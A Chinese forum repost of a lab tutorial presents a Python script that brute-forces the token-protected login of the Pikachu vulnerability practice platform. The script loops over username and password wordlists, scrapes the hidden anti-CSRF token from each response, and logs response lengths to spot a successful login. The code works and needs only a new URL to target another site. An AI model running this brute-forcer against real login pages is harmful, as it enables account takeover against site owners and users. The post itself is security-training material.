冰凌汇编

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 168|回复: 1
收起左侧

[Python] Python揭破网站登录密码(带token验证)

[复制链接]
HQ0731 发表于 2022-2-16 22:45:39
上一篇暴力破解文章:一个简单的Python揭破网站登录密码脚本



测试靶机为Pikachu漏洞练习平台暴力破解模块下的 “token防爆破?”
写这个脚本的起因是因为burp设置带token的暴力破解我只会用pitchfork草叉模式,要是用cluster bomb集束炸弹模式笛卡儿积那样就不会了,所以就干脆把之前写的脚本加了点东西实现这个功能了,到时候有空再学学多线程,爆破速度就更快了。

Python揭破网站登录密码(带token验证) - HQ0731_冰凌汇编


关键代码解释设置请求头

5~11行:指定url地址和请求头,user_token设置首次发送请求包时的token值。

[Python] 纯文本查看 复制代码
url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = '8680761fe979039a6f836599906'
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}

get_token函数获取token值

13~16行:这个函数返回从响应包中获取的token

在http响应包中有一个隐藏的标签里面有token值:

[Python] 纯文本查看 复制代码
<input type="hidden" name="token" value="5874161fe8db950ca7993759020" />


第15行:soup.select查找标签名为input,name为token的元素的value的值。

[Python] 纯文本查看 复制代码
def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="token"]')[0]['value']
    return user_token

完整代码:


[Python] 纯文本查看 复制代码
from bs4 import BeautifulSoup
import requests
from requests.models import Response
url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = '8680761fe979039a6f836599906'
#proxies = {"http": "http://127.0.0.1:8080"}  # 代理设置,方便burp抓包查看和调试
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'
}
def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="token"]')[0]['value']
    return user_token
if __name__ == "__main__":
    f = open('result.csv', 'w')     #把爆破结果储存到文件里,这里为csv格式
    f.write('用户名' + ',' + '密码' + ',' + '包长度' + '\n')    #给文件设置标题
    #遍历字典文件,Cluster bomb 暴力破解
    for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
        for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
            username = admin.strip()
            password = line.strip()
            payload = {     #payload为POST的数据
                'username': username,
                'password': password,
                'token': user_token,
                'submit': 'Login'
            }
            Response = requests.post(url, data=payload, headers=header)
            result = username + ',' + password + ',' + str(len(Response.text))  #用户名密码以及响应包长度
            print(result)           #输出到终端
            f.write(result + '\n')  #输出到文件
            user_token = get_token(Response)    #调用get_token函数获取下一次循环需要的token
    print('\n---完成---\n')
    f.close()

运行结果:
Python揭破网站登录密码(带token验证) - HQ0731_冰凌汇编

查看保存的文件,查看包长度与其他不一样的数据
这里csv不会显示前缀会自动去掉首位0,可以把文件改成txt格式就正常显示了


Python揭破网站登录密码(带token验证) - HQ0731_冰凌汇编


尝试登陆一下,登录成功。


Python揭破网站登录密码(带token验证) - HQ0731_冰凌汇编
原出处:https://blog.csdn.net/weixin_491 ... ttoming-11.nonecase
冰凌汇编免责声明
以上内容均来自网友转发或原创,如存在侵权请发送到站方邮件9003554@qq.com处理。
11544wwwq 发表于 2022-2-22 20:44:35
请你喝啤酒 - 11544wwwq_冰凌汇编 - 11544wwwq_冰凌汇编 - 11544wwwq_冰凌汇编 - 11544wwwq_冰凌汇编 - 11544wwwq_冰凌汇编
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|站点统计|Archiver|小黑屋|RSS|冰凌汇编 ( 滇ICP备2022002049号 滇公网安备 53032102000029号)|网站地图

GMT+8, 2022-10-6 21:32 , Processed in 0.135338 second(s), 8 queries , Redis On.

冰凌汇编 - 建立于2021年12月20日

Powered by Discuz! © 2001-2022 Comsenz Inc.

快速回复 返回顶部 返回列表